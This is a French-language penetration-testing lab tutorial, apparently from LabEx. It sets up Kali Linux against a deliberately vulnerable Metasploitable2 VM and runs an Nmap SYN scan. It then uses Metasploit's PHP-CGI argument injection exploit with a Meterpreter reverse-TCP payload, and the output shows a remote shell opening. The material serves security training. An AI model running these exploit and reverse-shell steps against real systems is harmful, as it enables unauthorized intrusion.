Introduction
Dans ce laboratoire, vous apprendrez à effectuer un scan de vulnérabilités et des tests de pénétration sur une machine cible en utilisant divers outils dans Kali Linux. L'objectif est d'acquérir une expérience pratique avec les outils de scan de vulnérabilités populaires et de comprendre comment exploiter les résultats pour mener des attaques de pénétration réussies. Le laboratoire sera réalisé sur la plateforme LabEx, où vous aurez accès à un conteneur Kali Linux comme machine d'attaque et à une machine virtuelle Metasploitable2 comme cible.
Configuration de l'environnement
Dans cette étape, vous allez démarrer le conteneur Kali Linux et la machine cible Metasploitable2 sur la plateforme LabEx.
- Ouvrez un terminal xfce sur la machine hôte LabEx et démarrez la cible Metasploitable2 en exécutant la commande suivante :
sudo virsh start Metasploitable2
Attendez que la machine cible démarre, cela peut prendre de 1 à 3 minutes.
- Testez la connectivité à la machine cible en l'envoyant des paquets ICMP (ping) :
ping 192.168.122.102
Appuyez sur Ctrl+C pour arrêter le ping.
- Lancez le conteneur Kali Linux et entrez dans l'environnement bash en exécutant :
docker run -ti --network host b5b709a49cd5 bash
- À l'intérieur du conteneur Kali, testez la connexion réseau à la machine cible :
ping 192.168.122.102
Appuyez sur Ctrl+C pour arrêter le ping.
Effectuer un scan de vulnérabilités avec Nmap
Dans cette étape, vous allez découvrir certains outils de scan de vulnérabilités populaires disponibles dans Kali Linux.
X-scan : X-scan est un outil de scan complet bien connu en Chine. Il est entièrement gratuit, ne nécessite pas d'installation et prend en charge à la fois des interfaces graphiques et en ligne de commande en chinois et en anglais. X-scan a été développé par un célèbre groupe de hackers chinois appelé "Security Focus" et a été constamment amélioré depuis sa version de test interne 0.2 en 2000.
Nessus : Nessus est l'un des logiciels de scan et d'analyse de vulnérabilités les plus largement utilisés dans le monde. Plus de 75 000 organisations utilisent Nessus pour scanner leurs systèmes informatiques. Nessus a été créé par Renaud Deraison en 1998 dans le but de fournir au communauté Internet un programme de scan de sécurité de systèmes distants gratuit, puissant, fréquemment mis à jour et facile à utiliser.
SQLmap : SQLmap est un outil d'injection SQL automatique qui peut scanner, détecter et exploiter les vulnérabilités d'injection SQL dans une URL donnée. Il prend actuellement en charge les bases de données MS - SQL, MySQL, Oracle et PostgreSQL. SQLmap utilise quatre techniques d'injection SQL uniques : l'inférence aveugle, les requêtes UNION, les requêtes empilées et l'injection aveugle basée sur le temps.
Nmap : Nmap est un outil puissant et polyvalent d'exploration de réseau et d'audit de sécurité. Il peut être utilisé à diverses fins, notamment la découverte de réseau, le scan de ports et la détection de vulnérabilités.
Maintenant, vous allez utiliser Nmap pour effectuer un scan de vulnérabilités sur la machine cible Metasploitable2.
- Démarrez le service de base de données Metasploit et initialisez la base de données :
cd ~
service postgresql start
msfdb init
- Lancez la console Metasploit :
msfconsole
- Dans la console Metasploit, utilisez la commande
nmappour scanner la machine cible :
nmap -sS -T4 192.168.122.102
Voici un exemple de sortie que vous pourriez voir :
[*] exec: nmap -sS -T4 192.168.122.102
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-23 23:15 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0032s latency).
Not shown: 977 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
25/tcp open smtp
53/tcp open domain
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
5432/tcp open postgresql
5900/tcp open vnc
6000/tcp open X11
6667/tcp open irc
8009/tcp open ajp13
8180/tcp open unknown
MAC Address: 52:54:00:1E:9E:B4 (QEMU virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
Le paramètre -sS effectue un scan TCP SYN (également connu sous le nom de scan semi - ouvert ou furtif), et -T4 définit la stratégie de temporisation comme étant agressive, mais pas trop rapide pour éviter un trafic réseau excessif.
- Observez la sortie du scan, qui devrait afficher les ports ouverts et les services sur la machine cible.
Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection
Exploitation d'une vulnérabilité
Dans cette étape, vous utiliserez les informations recueillies lors du scan Nmap pour exploiter une vulnérabilité sur la machine cible Metasploitable2.
- Tout d'abord, si vous n'êtes pas dans la console Metasploit, vous devriez démarrer la console Metasploit :
cd ~
msfconsole
- À partir des résultats du scan Nmap, identifiez un port ouvert sur la machine cible, par exemple, le port 80. Dans la console Metasploit, recherchez un module d'exploitation lié au port ouvert :
search http
- Utilisez le module d'exploitation approprié :
use exploit/multi/http/php_cgi_arg_injection
- Définissez l'adresse IP de la machine cible :
set RHOST 192.168.122.102
- Définissez la charge utile (payload) à utiliser :
set PAYLOAD php/meterpreter/reverse_tcp
- Définissez l'adresse IP de la machine locale :
set LHOST 192.168.122.1
- Exécutez l'exploitation :
exploit
Voici un exemple de sortie que vous pourriez voir :
[*] Started reverse TCP handler on 192.168.122.1:4444
[*] Sending stage (39927 bytes) to 192.168.122.102
[*] Meterpreter session 1 opened (192.168.122.1:4444 -> 192.168.122.102:38510) at 2024-03-23 23:21:14 +0000
Si l'exploitation réussit, vous devriez avoir accès au shell de la machine cible. Vérifiez l'accès en exécutant des commandes telles que
sysinfopour afficher les informations système.Si vous avez du temps, vous pouvez essayer d'explorer d'autres outils de scan de vulnérabilités comme Nessus, SQLmap ou X-scan. Vous pouvez également tenter d'exploiter différentes vulnérabilités sur la machine cible Metasploitable2.
Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection
Résumé
Dans ce laboratoire, vous avez appris à configurer un environnement Kali Linux pour les tests de pénétration et à utiliser des outils de scan de vulnérabilités populaires comme Nmap pour identifier les vulnérabilités potentielles d'un système cible. Vous avez également acquis une expérience pratique en exploitant une vulnérabilité à l'aide du Framework Metasploit. Ces connaissances pratiques vous aideront à comprendre l'importance du scan de vulnérabilités et des tests de pénétration dans le domaine de la cybersécurité.



